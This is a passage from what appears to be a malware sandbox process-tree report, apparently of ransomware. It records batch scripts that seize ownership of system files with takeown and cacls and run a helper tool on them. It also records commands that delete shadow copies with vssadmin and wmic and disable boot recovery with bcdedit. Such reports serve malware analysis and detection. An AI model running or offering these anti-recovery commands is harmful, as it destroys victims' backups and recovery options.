  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
      4⤵
      PID:3144
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl""
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl"
    3⤵
    - Modifies file permissions
    PID:540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
    3⤵
    PID:1420
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
      4⤵
      PID:2876
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl" /E /G Admin:F /C
    3⤵
    PID:288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl"
    3⤵
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl" -nobanner
    3⤵
    PID:2800
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl" -nobanner
      4⤵
      PID:3632
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl""
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl"
    3⤵
    - Modifies file permissions
    PID:3940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
    3⤵
    PID:2500
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
      4⤵
      PID:2892
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:2856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:1436
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:1420
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl""
  2⤵
  PID:2328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" /E /G Admin:F /C
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl"
    3⤵
    PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
    3⤵
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3944

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\pmy31InU.bat"
1⤵
PID:3392
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:420
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2520
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2740
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:940